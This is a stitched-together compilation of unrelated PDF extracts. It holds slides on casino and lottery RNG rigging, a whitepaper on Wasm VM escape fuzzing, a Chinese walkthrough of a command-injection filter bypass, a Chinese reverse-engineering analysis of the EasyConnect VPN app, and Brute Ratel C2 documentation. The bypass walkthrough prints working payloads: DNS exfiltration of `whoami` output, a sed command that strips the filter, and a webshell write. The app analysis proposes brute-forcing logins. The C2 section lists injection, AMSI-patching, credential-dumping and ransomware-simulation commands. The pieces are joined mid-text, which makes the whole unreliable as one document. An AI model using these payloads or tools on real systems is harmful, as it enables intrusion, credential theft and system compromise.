watched in slow motion only the 4s and 6s ever move more than a few inches from the bottom, as the rest of the balls had been weighted. © SeNet International Corp. 2017 16 July 2017 SeNet Ron Harris attacks against slots and keno Ronald Dale Harris is a computer programmer who worked for the Nevada Gaming Control Board in the early 1990s and was responsible for finding flaws and gaffes in software that runs computerized casino games. Harris took advantage of his expertise, reputation and access to source code to illegally modify certain slot machines to pay out large sums of money when a specific sequence and number of coins were inserted © SeNet International Corp. 2017 17 July 2017 SeNet Ron Harris attacks against slots and keno (Cont.) Harris surreptitiously coded a hidden software switch -- tripped by inserting coins in a predetermined sequence -- that would trigger cash jackpots. After retooling more than 30 machines, Harris and accomplices made the rounds, walking away with hundreds of thousands of dollars. © SeNet International Corp. 2017 18 July 2017 SeNet Ron Harris attacks against slots and keno (Cont.) Harris shifted his focus to the probability game Keno, for which he developed a program that would determine which numbers the game's pseudorandom number generator would select beforehand. When Harris' accomplice, Reid Errol McNeal, attempted to redeem a high value winning keno ticket at Bally's Atlantic City Casino Hotel in Atlantic City, New Jersey, casino executives became suspicious of him and notified New Jersey gaming investigators. The investigation led authorities to Harris and after a trial was sentenced to seven years in prison. He was released from prison after serving two years and currently resides in Las Vegas. © SeNet International Corp. 2017 19 July 2017 SeNet Previous iGaming hacks/scandals © SeNet International Corp. 2017 20 July 2017 SeNet Current Events © SeNet International Corp. 2017 21 July 2017 SeNet Eddie Tipton Hot Lotto RNG Rigging Rob Sand – Iowa Assistant Attorney General (lead prosecutor) Eddie Tipton Tommy Tipton Robert Rhodes © SeNet International Corp. 2017 22 July 2017 SeNet Tipton Overview Lottery Fraud Case Involving a $14.3 million prize! Lottery ticket purchased at a QuikTrip near Interstate Highway 80 on Dec. 23, 2010. Prize went unclaimed for almost a year, until Hexham Investments Trust, a mysterious company incorporated in Belize, tried to claim the prize through Crawford Shaw, a New York attorney, hours before the ticket was set to expire in 2011. © SeNet International Corp. 2017 23 July 2017 SeNet Tipton Overview (Cont.) Lottery officials refused to release the prize because those behind the trust declined to give their identities, which is required under Iowa law. Claim to prize was withdrawn in January 2012. At that time, Iowa Lottery officials asked the Iowa Attorney General's Office and Iowa DCI to investigate. On Oct. 13, authorities received a tip from an out-of- state employee of the Multi-State Lottery Association that Tipton was the man in the video. Investigators analyzed Tipton's cellphone records, which indicated he was in Des Moines when the ticket was purchased, according to the arrest report. They also discovered Tipton rented a silver 2007 Ford Edge on Dec. 22, which matched the vehicle of the buyer of the winning lottery ticket © SeNet International Corp. 2017 24 July 2017 SeNet Tipton Overview (Cont.) Eddie was convicted in 2015 of two counts of fraud following a weeklong trial. One of the fraud charges accused Tipton of tampering with the nonprofit's computers to rig the draw, while the second accused him of participating in the ill-fated attempt to redeem the ticket in late 2011 that sparked an investigation. He was sentenced to 10 years in prison, but has been out on bond pending appeal. June 29, 2016 Tipton pleaded guilty to three felony charges in Iowa and Wisconsin. The other states where fraud occurred have agreed not to prosecute. © SeNet International Corp. 2017 25 July 2017 SeNet Tipton Timeline March 2003 – Eddie Tipton is hired at MUSL November 23, 2005 – Colorado Lottery fraud December 29, 2007 – Wisconsin Lottery fraud December 29, 2010 – Kansas Lottery fraud December 29, 2010 – Iowa Hot Lotto fraud November 23, 2011 – Oklahoma Lottery fraud January 15, 2015 – Eddie Tipton arrested March 2015 – Rhodes was arrested on 2 counts of fraud July 20, 2015 – Eddie Tipton Convicted September 9, 2015 – Sentenced to 10 years, but free on bond pending appeal October 2015 – New criminal charges filed related to 2005 and 2007 fraud March 30, 2016 – Tommy Tipton charged June 29th, 2017 – Eddie pleads guilty in Iowa © SeNet International Corp. 2017 26 July 2017 SeNet How to rig the lottery Steps to rig the lottery: 1. Become a lottery RNG developer 2. Write code to make the numbers predictable 3. Have your friends buy tickets with the winning numbers © SeNet International Corp. 2017 27 July 2017 SeNet How he Rigged the Lottery © SeNet International Corp. 2017 28 July 2017 SeNet How he Rigged the Lottery (really) • In 2003 Eddie got a job as an RNG developer at MUSL • While working there he wrote code which made the numbers predictable on three dates • The source code and RNG binaries were certified by one of the major testing labs © SeNet International Corp. 2017 29 July 2017 SeNet How he rigged the lottery (cont.) • In 2016 SeNet was contracted to perform imaging of one of the rigged lottery RNGs • In 2016 after Eddie was convicted SeNet was given permission to review the RNG images • Eddie didn’t seem smart enough to write a rootkit which could change lottery numbers in memory • So despite the official explanation (which he was convicted off of) for how he rigged the lottery I assumed he simply slipped some code into the RNG which rigged it… • At this point we only had the binaries (no source code) © SeNet International Corp. 2017 30 July 2017 SeNet Reverse Engineering • The RNG consisted of an executable (QV.EXE) which contained the front-end material • A DLL (QVRNG.DLL) which contained the PRNG • And a DLL (AWRAND.DLL) which interfaced with the hardware RNG • QVRNG.DLL was an obvious first choice for an RNG rigger • So I looked at QVRNG.DLL first • I briefly skimmed through all of the functions. One of them caught my eye… © SeNet International Corp. 2017 31 July 2017 SeNet Logic Bomb © SeNet International Corp. 2017 32 July 2017 SeNet Logic Bomb (Cont.) • At this point we also knew that all of the alleged illicit lottery wins related to the case were on two different days: November 23rd and December 29th (November 22nd and December 28th on leap years) • So this function full of references to date checks and the PRNG internals was pretty suspicious • Also the function was at the end of the binary (as if it had been tacked on to the end of a source file) which was suspicious • At this point we were able to obtain the source code for the RNG • Sure enough there were 25 functions in the source code and 26 functions in the binary © SeNet International Corp. 2017 33 July 2017 SeNet Logic Bomb (Cont.) © SeNet International Corp. 2017 34 July 2017 SeNet Logic Bomb (Cont.) © SeNet International Corp. 2017 35 July 2017 SeNet Logic Bomb (Cont.) • The date calls corresponded to the two known dates of lottery rigging • Plus one additional date: May 27th (May 26th on leap years) • Additional conditions for the RNG rigging were identified and correlated with known illicit winnings • For example, the RNG was only rigged on Wednesdays and Saturdays © SeNet International Corp. 2017 36 July 2017 SeNet Logic Bomb (Cont.) © SeNet International Corp. 2017 37 July 2017 SeNet Logic Bomb (Cont.) • The method by which the function reseeded the RNG with predictable numbers was identified • Basically he just took various game parameters including the number of numbers per draw and the maximum and minimum numbers in the game and multiplied them together along with the number 39 and the summed ASCII values of the letters in the computer name. Then he took that and added it to the day of the year and added in the product of the number of times the RNG had run since the last reboot and the year. • This number is then used to seed the PRNG. • Then he drew a quantity of numbers from the RNG corresponding the quantity of numbers which had been drawn since the RNG last restarted. The last number drawn was then used to seed the PRNG a second time. © SeNet International Corp. 2017 38 July 2017 SeNet Why didn’t certification work? • The RNG was certified by one of the major testing labs • The certification ran the output of the RNG through statistical tests to ensure unbiased results… • But the output of the rigged RNG was statistically unbiased • The lab performed an audit of the source code… © SeNet International Corp. 2017 39 July 2017 SeNet How he could have done it better • Rigging the lottery on only three dates made it easier to identify illegal winnings • Making numbers dependent on variables like the computer name and time of day meant he had to buy multiple tickets for each drawing • The method of rigging the RNG could have been more discrete © SeNet International Corp. 2017 40 July 2017 SeNet How can this be prevented in the future? • RNG source code should undergo in-depth third-party reviews • The binaries (including updates) should be compiled and checked (e.g. via Bindiff) against the binaries provided by the RNG vendor • The machine itself should be imaged and configured either by a third party or in a supervised manner © SeNet International Corp. 2017 41 July 2017 SeNet Russian slot machine hacking https://www.wired.com/2017/ 02/russians-engineer-brilliant- slot-machine-cheat-casinos- no-fix/ https://www.youtube.com/wat ch?v=W_vdoaKsP5Y (Willy Allison World Game Protection Conference) © SeNet International Corp. 2017 42 July 2017 SeNet Russian slot machine hacking (cont.) • In 2009 Russia made majority of gambling illegal, this led to a number of slot machines being sold to whomever they could find • By 2011 casinos in Europe were noticing suspicious payouts • In June of 2014 in a casino in Missouri noticed unusual activity with some slot payouts, Missouri Gaming Commission was notified • December of 2014 the same individuals were arrested back in Missouri • 2016 some more were arrested and prosecuted in Singapore © SeNet International Corp. 2017 43 July 2017 SeNet Russian slot machine hacking (cont.) • Slot machine software was reversed engineered and a weakness discovered in the PRNG • Phones were used to record about 24 spins • Data uploaded and using video footage they were able calculate the pattern based on the slots PRNG • Information is transmitted to a custom app with a listing of timing marks that cause the mobile to vibrate 0.25 seconds before the spin button should be pressed • Not always successful, but the result is higher payout than expected How did they do this? © SeNet International Corp. 2017 44 July 2017 SeNet Russian slot machine hacking (cont.) Video Demonstration © SeNet International Corp. 2017 45 July 2017 SeNet What casinos and operators can do to protect themselves • Understand that compliance != security • Similar to other verticals more budget needs to be spent on information security • Operators need to question game manufacturers on their security controls © SeNet International Corp. 2017 46 July 2017 SeNet Current gaming regulations with security components • Maryland Gaming Commission requires an annual IT Security Assessment be performed by an independent and approved 3rd party on an annual basis. • New Jersey Division of Gaming Enforcement has written in their iGaming standard that a security assessment be performed once a year on the iGaming platforms. Also includes other requirements such as auditing, password complexity, etc… • Various tribal Minimum Internal Controls (MICs), however, these are typically very high-level. • Also your typical regulatory compliance standards (i.e. PCI) • Often left up to the operator to determine what level of security is implemented. © SeNet International Corp. 2017 47 July 2017 SeNet Conclusion While regulated iGaming has added additional controls there is still room from improvement (both from operators and regulators). In our opinion a major risk exists in the code and SDLC process (this is an area that is not really examined by regulators). With gaming (all formats) becoming more widely accepted across the United States it is important the operators and regulators works together to protect the integrity of the games. © SeNet International Corp. 2017 48 July 2017 SeNet Questions
pdf
Cyberpeace Whitepaper Is WebAssembly Really Safe? - Wasm VM Escape and RCE Vulnerabilities Have Been Found in New Way July 19, 2022 – Version 1.0 Prepared by Zhao Hai(@h1zhao) Zhichen Wang Mengchen Yu Lei Li Abstract WebAssembly(Wasm) supports binary format which provides languages such as C/C++, C# and Rust with a compilation target on the web. It is a web standard with active participation from all major browser vendors (chrome, edge, Firefox, safari). Also, Wasm runtime can be widely used for edge computing. Previous research on Wasm security mostly focuses on exploitation at the compiler and linker level, but few people focus on Wasm VM escape. Therefore, we design a new fuzz framework based on Wasm standard to explore the runtime vulnerability itself. The framework can be compatible with all programs or projects containing Wasm design standards. If there is an escape vulnerability in the browser kernel or any project that uses Wasm runtime, when an attacker deploys a page or service containing a malicious Wasm binary, he can control the access device or the server that provides the runtime service. We find that these escape vulnerabilities are usually caused by inadequate operand boundary checking of bytecode interpreter or stack overflow of WASI API. For example, in wasm3 and WasmEdge projects, we use the above two methods to achieve VM escape. Meanwhile, there are many exploitable vulnerabilities in the parsing of file data structure, which are usually overflow vulnerabilities caused by inadequate inspection of some input fields. Normally, these vulnerabilities will lead to denial of service attacks. In the process of fuzzing, we find that almost all wasm runtime projects can exploit such vulnerabilities Finally, we will show the off-by-one vulnerability of a PC stack of WasmEdge that we discovered, which successfully conducts RCE on the host. This process is very ingenious and we will explain it in detail at the demo time. 天虞实 验室 TianYu Table of Contents 天虞实验室 TianYu Lab 2 1 Introduction............................................................................................................... 3 2 WASM........................................................................................................................4 2.1 WASM Structure.................................................................................................................. 4 2.2 WASM S-Expresson......................................................................................... 4 2.3 WASM Virtual Machine.................................................................................................... 4 3 WASM-Fuzzer...........................................................................................................5 4 WASM-Runtime........................................................................................................7 4.1 WASM3...................................................................................................................................7 4.2 WasmEdge.........................................................................................................8 5 Conslusions................................................................................................................ 9 1 Introduction 天虞实验室 TianYu Lab 3 WebAssembly is a technology developed by a W3C Community Group.The initial goal was to allow the developers to take their native C/C++ code to the browser, making the websites ran more faster.WebAssembly runs code in the virtual machine, so it is cross platform like Java.Now wasm is used in more fields, in the embedded field, it can be used to write platform independent programs,in the field of cloud computing, it can be used for program isolation, similar to docker. Therefore, it is significant to research WebAssembly Security. WebAssembly make the code runs safe, because it separate control flow stack and data stack. During execution, only the data stack can be modified, the control flow stack is fixed during parsing stage.So when a C/C++ program with a buffer overflow vulnerability compiled to wasm bytecode, it can’t be exploitable. The summary is that all vulnerability overflows occur in the data stack and will not have any impact on the program flow stack.WebAssembly System Interface is a interface for WebAssembly to use System APIS, such as file operations, network.WASI is restricted by permissions, so it’s safe. Previous research on wasm security mostly focuses on exploitation at the compiler and linker level, but few people focus on wasm virtual machine escape.Our research focus on wasm virtual machine’s vulnerability,we design a fuzzing tool to find vulnerabilities. Why we design a new fuzzing framework rather than existing fuzzing tool ? The wasm file has a certain data structure. When the wasm runtime validates, only the wasm samples that pass the validation can be executed in the next step. The samples generated by traditional tools such as AFL are raw binary files do not have contextual dependencies, which leads to no correlation between data structures, and the effect is not ideal.We analyse the wasm virtual machine’s structure,there are three possible vulnerabilities in wasm virtual machine: one is the parser of wasm file, the second is the interpretation and execution of byte code of wasm, and the third is the WASI API. Our fuzzing tool is also designed based on these situations. We found some exploitable vulnerabilities in wasm virtual machine. we will introduce the wasm virtual machine’s architecture, we will show the vulnerability existed in wasi api and exploit it. we will show how to use bytecode to spray the heap, from a bytecode off by one to get code executions. 2 WASM 天虞实验室 TianYu Lab 4 2.1 WASM Structure Wasm consists of many sections, the CODE section stores wasm bytecode, the import section stores some imports’ name string, the wasi is also imported from import section. 2.2 WASM S-Expression The S-Expression can be understood by human beings,it’s just like this same as the wasm binary, it consists of many sections. The wasm bytecode is stack-based, for example, i32.const 16191 will push value 16191 to stack. i32.add will pop two values from stack to add and then push the result to stack. 2.3 WASM Virtual Machine (module (memory $0 1) (export "memory" (memory $0)) (export "main" (func $main)) (func $main (; 1 ;) (result i32) (i32.const 16191) ) ) 3 WASM-Fuzzer 5 天虞实验室 TianYu Lab We focus on wasm file structure、wasi api、bytecode implemention in runtime.We develop a wasm sample generator.It constructs samples in sections,abstracts each section into a class structure and maintain it. The design of generator adopts the idea of object-oriented, and splits the data structure of the entire WASM. Wasm is composed of a variety of different sections, then design different classes to handle different sections, and each object is responsible for its own small part sample generation. For the code section, it mainly stores some wasm bytecodes. Each bytecode is designed with a corresponding class, which is responsible for obtaining data from Random and generating some required operands. This class will also add some rules to limit the scope of the operand. The operand of some bytecode may depend on some other objects in wasm, it's needed to design a Context class to store some context-related data for other objects to use, and finally output the binary data corresponding to this bytecode into the sample. The quality of the sample generator directly affects the fuzz effect. In a data structure, if some places are constants, there is no need to detect new paths for mutation. For example, the API name of Wasi is some fixed strings, and mutation of these strings has no effect, so it is fixed; For example, if a field is a CRC check value, it cannot be generated correctly by random mutation, so you need to calculate the CRC of the data according to the rules and fill in the field later. The value of some fields is limited to a range, such as a string variable whose value is limited to a random one in the ["apple", "banana"] list, so the field only needs to be selected from the list when it is generated. In the sample generator, we have implemented our own strategic random number generator. 3 WASM-Fuzzer 6 天虞实验室 TianYu Lab For example, in the algorithm in the figure above, according to previous experience, the most likely problem of integers is integer overflow, which often occurs near the boundary of integers. Therefore, it is necessary to make the probability of boundary values greater. Range in the figure is a random number generator, and which value to return is selected according to the value of range. Similarly, we encapsulate the generation algorithms of some basic data types, such as integer64, short, float32, float64, etc., and use strategic methods to make their boundary values appear more frequently. When the sample generator runs independently, the value of range comes from /dev/urandom, which is random. However, if you want to add it to AFL, libfuzzer and other tools and support coverage guidance, you only need to change the data source of range to read from the original binary data generated by AFL, libfuzzer and other tools. That is, all values are no longer autonomously random, but based on the samples of the fuzzer tool, which is equivalent to establishing a data mapping. Each data in the original data of the fuzzer tool uniquely corresponds to a state in the sample generator, which makes it possible for the sample generator to guide based on coverage. When the value of data is not enough, return the constant 0 instead of reading a data randomly from /dev/urandom, which is to ensure the uniqueness of the mapping. If the value of data is not enough to return a random number randomly, for the same data, the state it brings to the whole sample generator is not unique, and the coverage guidance cannot be completed. 4 WASM-Runtime 7 天虞实验室 TianYu Lab 4.1 WASM3 Wasm3 uses a _pc stack and _sp stack, where the pc stack stores a series of runtime functions and parameters corresponding to opcode the parameter in _pc stack uses slot index, which represents the parameter in the subscript in _sp, in the runtime function, from the value of the parameter was read in _sp. Among them the data operations in wasm bytecode are in _sp stack, _sp stack only stores data, so stack overflow in the traditional sense, such as the operation similar to memcpy(buf, P, 0x10000) implemented by wasm bytecode, cannot affect the program flow of wasm bytecode. Therefore, the design of wasm is safe, but if there is a problem with the wasm runtime itself, it will be unsafe. For example, in the process of runtime compile, a handle needs 3 slots, but the compiler calculates the number of slots as 2 incorrectly, so the third slot value is the address of the next handle, and this value is used as a subscript to access _sp stack, which is a bytecode level vulnerability we found. Wasm runtime is a virtual machine, so the idea of virtual machine escape can be used for reference. Virtual machines often escape through the vulnerabilities of 4 WASM-Runtime 8 天虞实验室 TianYu Lab various devices. Under many wasm runtime, Wasi APIs are implemented. These APIs work on the host, so you can find such API vulnerabilities. 4.2 WasmEdge The structural design of wasedge is also the separation of data stack and execution stack. In the execution stack, there are a series of instruction objects. We discovered the off by one vulnerability of a PC stack in wasedge, and successfully conducted rce, from an off by one to a complete exp. this process is very clever, and we will explain it in detail at the demonstration meeting. 5 Conclusions 9 天虞实验室 TianYu Lab The wasm standard is designed to be secure, but the wasm runtime is not entirely secure. The escape trigger of the Wasm VM is usually based on the bytecode interpreter and the WASI API, so we must focus on these two modules when designing. It's suggested to add more tests to check for bugs in these two aspects, strictly check the operands of opcode, and strictly check the parameters passed in by wasi api. We will further study more wasm runtime projects in the future, and provide more support for related project security.
pdf
前⾔ 今天遇到⼀个有意思的Linux命令执⾏绕过分享⼀下。 某⽹络设备后台有个Ping功能,命令执⾏⽆回显,使⽤ dnslog收到请求,因此icmp、dns出⽹。 但是进⼀步命令执⾏的时候发现存在很多替换为空的过滤。 第⼀步绕过,cp命令读取源码。 ping.php中存在参数过滤函数,并且使⽤ exec() 命令执⾏因此⽆回显。 根据include包含的⽂件必然能找到过滤函数所在的⽂件。 过滤如下 `whoami`.dnslog cp ping.php ping.txt cd ..\ncd ..\ncd ..\ncd ..\ncd model\ncp filter.php filter.txt $val = str_replace("<", "", $val); $val = str_replace(">", "", $val); $val = str_replace("/", "", $val); $val = str_replace("+", "", $val); $val = str_replace("'", "", $val); $val = str_replace("\"", "", $val); $val = str_replace(";", "", $val); $val = str_replace("?", "", $val); $val = str_replace("%", "", $val); $val = str_replace(")", "", $val); $val = str_replace("(", "", $val); $val = str_replace(":", "", $val); $val = str_replace("&", "", $val); $val = str_replace("|", "", $val); 第⼆步绕过,sed删除过滤⾏。 which 存在wget,尝试wget发现tcp不出⽹。 后来想到sed,可以增加删除替换,但是增加和替换php代码都需要⽤到标点,于是去删除过 滤函数中的过滤代码(注意事先cp备份)。 最后,写个shell。 先写个⼀句话,phpinfo发现是php5.2的,shell连接⼯具的加密别选aes,或者直接上个⼤ ⻢。 其他思路 当时另⼀个思路就是后台还有⽇志功能,可以考虑写⼊shell到⽇志⽂件,再cp到web⽬录, 因为sed成了就没去试。 想听听⼤家有什么其他的可⾏思路。 抱拳了.jpg cd ..\ncd ..\ncd ..\ncd ..\ncd model\nsed -i 4d filter.php cmd=file_put_contents('2.php', base64_decode('xxxxxxxx');
pdf
一、概述 最近需要逆深信服的 Easyconnect.apk,无壳但有混淆,so 层抛弃整个系统通信框架, 使用自编译的 openssl 为后续与服务器通信(图片均已厚码处理)。感谢看雪高研。有什 么错误还请师傅指出。 二、连接服务器请求分析 连接服务器时,会发送先后两个请求,下面先看第一个: 先使用脚本 hook onclik 点击事件,得到所实现的 ConnectActivity: [WatchEvent] onClick: com.sangfor.vpn.client.phone.ConnectActivity 跟入 o(): o()中调用 showDialog(10)显示对话框后,再新建 cb 对象,并新建异步任务: 任务中调用了 cb 对象的 a(): 继续跟进 b()方法,其中 arg2 为 url: url 经过判断后,进入 ConnectActivity 的 a()方法,在该方法中设置好相应参数后调用 l()方 法: L()方法中拼接 url 新建异步任务: 其中在任务中 doInBackground()调用了 ConnectActivity.a()方法: 在 A()中主要调用了 HttpConnect.requestStringWithURL(): 继续跟入最终调用了 httprequest()的 native 方法: 根据后续的分析 arg1 为 url,arg2 为 TWFID 等 cookie 信息,agr3 为传输的内容,arg4 为是 否为 post 提交,arg5 后续加密验证方式,arg6 为 http 版本 接着在 onPostExecute 发送第二个请求给服务器: 跟入其 a()方法,同样调用了 ConnectActivity.a()方法: 进行跟入 b(),可见在函数新建了线程,跟入其线程函数: 注 意 这 里 v2.put(“mobileid,u.f().b()”) 把 mobileid 一 起 发 给 服 务 器 https://ip:port/por/login_auth.csp?dev=android-phone&language=zh_CN 最后调用 httpRequest()发送给服务器的数据包,: 在发第二个请求包时,会先获取到内存中的 mobileid,V2 为 hashmap,在调用 httpRequest 前压入了值,跟入 b():: B()返回 f 的值,查找引用: 可见 f 为 nDeprecatedEncryptMobileId()调用后的结果返回给 a()执行后的值 跟入 A(),可见函数主要对传入参数进行 md5: 故我们 hook 住 nDeprecatedEncryptMobileId 函数得到其 mobileid 和返回值: ("27b3d55fdc6e0c60") "P\u0004\u0006\u0006QSQ\u0005R\u0006\u0006\u0006\u0006S\u0004\u0007" 我们回头看看 mobileid 是如何产生的,可见是先从 map 中取出: 查找引用找到相关赋值的地方,跟入 c(): 找到其 this.g 赋值,可见先调用了 e()进行判断是否有 telephony 模块: 如果有则调用 getDeviceId(): 三、登录请求分析 接着就是登录请求的数据包,我们通过上面找到发包的函数,先进行 hook: 注意第二个数据包的响应包含<TwfID>xxxxxxxxxxx</TwfID>,该值会先保存在 cookie 中在 登录时一同发送: Ver 为当前软件版本 mobileid 是 md5 后的值,固定的 TWFID 是第二个请求服务器后返回的值,后续保存在 cooike 中。 MOBILETWFID 与 TWFID 一样 svpn_password 用户名 svpn_name 密码 我们跟入函数所在 so,经观察 so 中自编译 openssl 库,但符号还在: 直接上脚本 hook libc,因为 so 中自编译 openssl 库,直接调用 libc 的 write 和 read,不走 libssl 的 ssl_write/bio_wriet 和 ssl_read/bio_read,所以 hook libc 只能捉到对应的密文: 我们可以 hook libhttps.so 的 SSL_write()和 SSL_read()即可得到 SSL 处理前的明文: 这是连接服务是所发送的第一个请求及其响应的数据: 这是连接服务是所发送的第二个请求及其响应的数据: 这是用户登录时所发送的用户名及数据给服务器的请求及其响应: 我们可以构造 mobileid 后请求服务器 https://ip:port/por/login_auth.csp 得到后续 TWFID, 使用 frida 主动调用 httpRequest 并传入 TWFID 访问 https://ip:port/por/login_psw.csp 进行 爆破。
pdf
BRC4 - Brute Ratel Customized Command and Control Center Ratel War Room Ratel Server - TeamServer API Ratel War Room is an API driven server which works over HTTP and WebSocket Start Mode Ratel Mode Ratel mode is the core server mode which interacts with badgers, starts listener and is your main C2 communication channel. Boomerang Mode In Boomerang mode, the server acts as a standalone socks and HTTPS proxy server. APIs /access /status /task Brute Commander Warmongers - Users Add Warmonger C4 profiles {   "admin_list": {       "admin": "admin@123"   },   "user_list": {       "brute": "password@123",       "ratel": "password@123"   } } Delete Warmonger Reset Warmonger Warmonger List Covert Communication C4 Profilers export import C4 Profiler - Listners Add Listeners Create Listener C4 Profiler->Add Listener C2 Authentication Common Authentication for all badgers OTA or One Time Authentication View Authentication Change Authentication Stop Listener Hosted Files Add New URI Listener Actions->Add New URI Host Files Listener Actions->Host File View Hosted C4 Profiler->Hosted Files Root Page Manager C4 Profiler->Change Root Page C4 Profiler - Payload Payload Profiles via Brute Commander HTTP SMB TCP Payload Profiles via C4 Profilers {   "payload_config": {       "main_http": {           "c2_auth": "abcd@123",           "c2_uri": [               "content.php",               "admin.php"           ],           "extra_headers": {               "Cache-Control": "no-cache",               "Connection": "close",               "Cookie": "AUTH-1babbba6265ca2eba78b65bda5e34545c32a95b2; Version=default; id=a3fWa; Expires=Thu 31 Oct 2021 07:28:00 GMT;",               "Pragma": "no-cache",               "Referer": "https://mail.microsoft.com",               "x-pm-apiversion": "3",               "x-pm-appversion": "Web_3.16.33", Badger Management - Beacon Management Badger Console double clicking a badger or right clicking and selecting the Load button Process Manager               "x-pm-uid": "d0e1f5b0dc08202064de25a",               "Host": "test.azureedge.net"           },           "host": "10.10.10.1",           "port": "443",           "ssl": true,           "type": "HTTP",           "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"       },       "main_tcp": {           "c2_auth": "abcd@123",           "host": "127.0.0.1",           "port": "10000",           "type": "TCP"       },       "main_smb": {           "c2_auth": "abcd@123",           "smb_pipe": "\\\\.\\pipe\\mynamedpipe",           "type": "SMB"       }   } } Pivot Graph Riot Control You can send commands to multiple badgers simultaneously via a single console with Riot Control Kill Switch Activate KillSwitch Activating Kill Switch will activate exit command for all active badgers. Arsenal loadr - load reflective DLLs command GUI Crypt Vortex Crypt Vortex is a ransomware simulation reflecive DLL which uses a custom encryption algorithm to encrypt the files. encryption decryption LDAP Sentinel The LDAP Sentinel is a LDAP quering reflective DLL which provides a graphical user interface on Commander to query Active Directory for different objects and attributes. tons of prebuilt queries Socks Bridge Socks Bridge is a reflective DLL which can be injected to any process. It is a connecter which connects to Boomerang’s HTTP/HTTPS Socks Server. Start socksbridge Using socksbridge C4 Profiler - Command Register Command Profiler DLL Register PE Register {   "register_dll": {       "boxreflect": {           "file_path": "server_confs/boxreflect.dll",           "description": "Loads a test reflective dll message box",           "artifact": "WINAPI",           "mainArgs": "NA",           "optionalArg": "NA",           "example": "boxcheck",           "minimumArgCount": 1,           "replace_str": {               "boxit": "\\x00\\x00\\x00\\x00\\x00",               "!This program cannot ": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0 0",               "be run in DOS mode.": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"           }       }   } } {   "register_pe": {       "seatbelt": {           "file_path": "server_confs/Seatbelt.exe",           "description": "Runs Seatbelt C# executable",           "artifact": "WINAPI",           "mainArgs": "NA",           "optionalArg": "NA",           "example": "seatbelt",           "minimumArgCount": 1       }   } } PIC Register Autoruns C4 profile GUI C4 Profiler->Autoruns Click Scripts C4 Profiler->Clickscripts {   "register_obj": {       "o_getprivs": {           "file_path": "server_confs/getprivs.o",           "description": "Get privilege of current user",           "artifact": "WINAPI",           "mainArgs": "NA",           "optionalArg": "NA",           "example": "o_getprivs",           "minimumArgCount": 1       }   } } {   "autoruns": [       "sleep 60 30",       "set_child werfault.exe",       "id",       "get_privs",       "dcenum"   ] } Create a click script via profile Run a click script "click_script": {   "Credential Dumping": [       "samdump",       "shadowclone",       "dcsync"   ],   "Discovery": [       "id",       "pwd",       "ipstats",       "psreflect echo $psversiontable",       "net users",       "scquery"   ] } Command Transmission Brute Ratel uses a custom encryption algorithm between the badgers and the c4 server. This encryption is performed using a random key that the user provides. If a user does not provide an encryption key, the service generates it dynamically. Server Credential Manager Add/Import/Remove Credentials Server->Add Credentials Make Token Server->Save All Credentials Download Manager Server->View Downloads Log Viewer Server->View Logs Scratchpad User Activity Log Server->User Activity MITRE Team Activity Brute Ratel MITRE Map Server Config->Brute Ratel MITRE Map Watchlist Event Viewer Latest Web Activity Statistics Command Queue PsExec Config *C4 Profiler->PsExec Config* Scratchpad Adversary Simulation Adversary simulation JSON file Satrt adversary simulation C4 Profiler->Load Simulation Badgers References Process Injections/PPID Spoofing/Arguement Spoofing v0.1 run Executes a windows process and returns output of the target process. This command can be used alongside set_parent and set_arguement to change the parent process and spoof commandline arguements v0.1 loadr Loads a reflective DLL into a remote process memory. The target process in which the DLL will be injected can be changed using set_child. The parent process can be spoofed using set_parent v0.1 set_child Changes the target process which gets injected with DLL or PE when using loadr, psreflect, sharpreflect or other Brute Ratel Arsenal modules v0.1 set_parent Changes the parent process ID which gets spoofed when using loadr, psreflect, sharpreflect, run or other Brute Ratel Arsenal modules v0.1 get_child Gets the target process set for reflective DLL injection or C# PE injection v0.1 get_parent Gets the parent process ID set for reflective DLL injection, C# PE injection or any other process creation v0.1 clear_child Sets child process to null. Commands dependent on injection will return error v0.1 clear_parent Sets parent process ID to 0. Commands dependent on injection and process creation will use badger’s process ID as parent v0.1 pcinject Injects a new http/tcp/smb payload using an existing payload configuration to a given process id v0.2 shinject Load position independent shellcode into a remote process v0.1 psreflect Injects a powershell reflective DLL loader to a remote process to run powershell commands without running powershell.exe process using the Unmanaged PowerShell technique. The powershell loader patches AMSI to evade basic signatures v0.1 psclean Clears any powershell script loaded to memory for powershell reflection v0.1 psimport Loads a powershell script to memory which can be Invoked using psreflect v0.1 sharpreflect Injects a C# reflective DLL loader to a remote process to run C# PE in memory v0.1 camouflage Injects a reflective PE to a remote process which requests user credentials with a windows-security-styled pop-up and returns captured user credentials v0.1 set_arguement Sets spoofed commandline argument for run command by modifying the PEB. Every process created will use this as spoofed argument until clear_arguement is used. Using this without understanding the limitations of command-line arguement spoofing might stop processes from executing when using the run command v0.1 clear_arguement Clears spoofed commandline argument for run command v0.1 get_arguement Gets spoofed commandline argument set for run command v0.1 cryptvortex Encrypts a given directory/file to simulate ransomware features v0.2 objexec Loads a relocatable object file in memory and executes them in the memory of the badger v0.2 set_objectpipe Sets the name of the namedpipe to fetch output from objexec v0.2 get_objectpipe Gets the name of the namedpipe used to fetch output from objexec v0.4.1 set_malloc Sets the memory allocation and writing technique for process injection v0.4.1 get_malloc Gets the memory allocation and writing technique for process injection v0.4.1 set_threadex Sets the thread execution technique for process injection v0.4.1 get_threadex Gets the thread execution technique for process injection v0.1 run Executes a windows process and returns output of the target process. This command can be used alongside set_parent and set_arguement to change the parent process and spoof commandline arguements v0.4.2 dll_block Enables process mitigation policy to block non-microsoft signed dlls from loading into remotely created process v0.4.2 dll_unblock Disables process mitigation policy to block non-microsoft signed dlls from loading into remotely created process v0.1 dcenum Enumerates basic domain information v0.1 ldapsentinel (Accessible via GUI) Provides a GUI interface to query domain objects and has a predefined set of ldap queries v0.1 cd Changes directory and supports SMB navigation v0.1 ls Lists directory contents and supports SMB navigation v0.1 lsdr Lists drives in the current system v0.1 socksbridge (Accessible via GUI) Connects to Boomerang’s socks server v0.1 pivot_smb Connects to SMB badger over named pipe and uses custom encryption of Brute Ratel for communication v0.1 pivot_tcp Starts TCP listener on the badger and uses custom encryption of Brute Ratel for communication v0.1 stop_tcp Stops a TCP listener on the badger v0.1 list_pivot Lists pivot badgers for current badger v0.3 *psexec 